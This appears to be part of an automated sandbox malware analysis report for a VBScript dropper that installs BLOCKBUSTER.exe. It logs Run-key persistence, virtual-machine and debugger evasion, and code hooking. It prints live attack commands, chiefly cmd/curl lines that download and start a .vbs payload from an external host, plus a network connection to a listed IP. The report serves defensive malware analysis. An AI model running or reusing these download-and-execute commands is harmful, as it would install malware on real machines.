Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\taskkill.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: wkernel32.pdb source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: BLOCKBUSTER.exe, 0000000E.00000002.2569344059.000000006FCF5000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wkernel32.pdbUGP source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("cmd /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.cli", "2", "true");IWshShell3.ExpandEnvironmentStrings("%PUBLIC%");IWshShell3.Run("cmd /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.cli", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\6723653391970.vbs", "2", "true");IWshShell3.ExpandEnvironmentStrings("%PUBLIC%");IWshShell3.Run("cmd /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.cli", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\6723653391970.vbs", "2", "true");IWshShell3.Run("cmd /V/D/c start C:\Users\Public\6723653391970.vbs", "2", "true")

Contains functionality to dynamically determine API calls

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCF1767 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_6FCF1767

PE file contains sections with non-standard names

Source: 7zxa.dll.9.dr

Static PE information: section name: .didata

Uses code obfuscation techniques (call, push, ret)

Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCEDE65 push ecx; ret		14_2_6FCEDE78
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCEBD4A push esi; iretd		14_2_6FCEBD4B

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Drops PE files

Source: C:\Windows\System32\wscript.exe	File created: C:\_672365339188b\unrar.dll	Jump to dropped file
Source: C:\_672365339188b\BLOCKBUSTER.exe	File created: C:\Users\user\AppData\Local\Temp\hcx.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\_672365339188b\7zxa.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\_672365339188b\BLOCKBUSTER.exe	Jump to dropped file

Source: C:\_672365339188b\BLOCKBUSTER.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BLOCKBUSTER			Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BLOCKBUSTER			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with function prologues

Source: C:\_672365339188b\BLOCKBUSTER.exe	Memory written: PID: 4828 base: CC40000 value: 8B FF 55 8B EC E9 EB 4F 60 69	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Memory written: PID: 4828 base: CC50000 value: 8B FF 55 8B EC E9 3B 52 5F 69	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Memory written: PID: 4828 base: CC60000 value: 8B FF 55 8B EC E9 2B 2E 5E 69	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49950

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\_672365339188b\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found dropped PE file which has not been started or loaded

Source: C:\_672365339188b\BLOCKBUSTER.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hcx.dll

Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\_672365339188b\BLOCKBUSTER.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\_672365339188b\BLOCKBUSTER.exe

API coverage: 0.6 %

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Windows\System32\wscript.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCDC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,

14_2_6FCDC2D0

Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;0
Source: curl.exe, 00000004.00000003.2175511371.000001C44D3A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldd5XP
Source: BLOCKBUSTER.exe, 0000000E.00000003.2385060468.0000000000F29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(

Source: C:\_672365339188b\BLOCKBUSTER.exe

API call chain: ExitProcess graph end node

Source: C:\_672365339188b\BLOCKBUSTER.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCE9D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

14_2_6FCE9D73

Contains functionality to dynamically determine API calls

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCF1767 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_6FCF1767

Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE9D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6FCE9D73
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCF13E1 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	14_2_6FCF13E1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCEF0D4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6FCEF0D4

Source: C:\_672365339188b\BLOCKBUSTER.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: 7zxa.dll.9.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 64.95.10.38 80

Jump to behavior

Excessive usage of taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\_672365339188b\BLOCKBUSTER.exe "C:\_672365339188b\BLOCKBUSTER.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
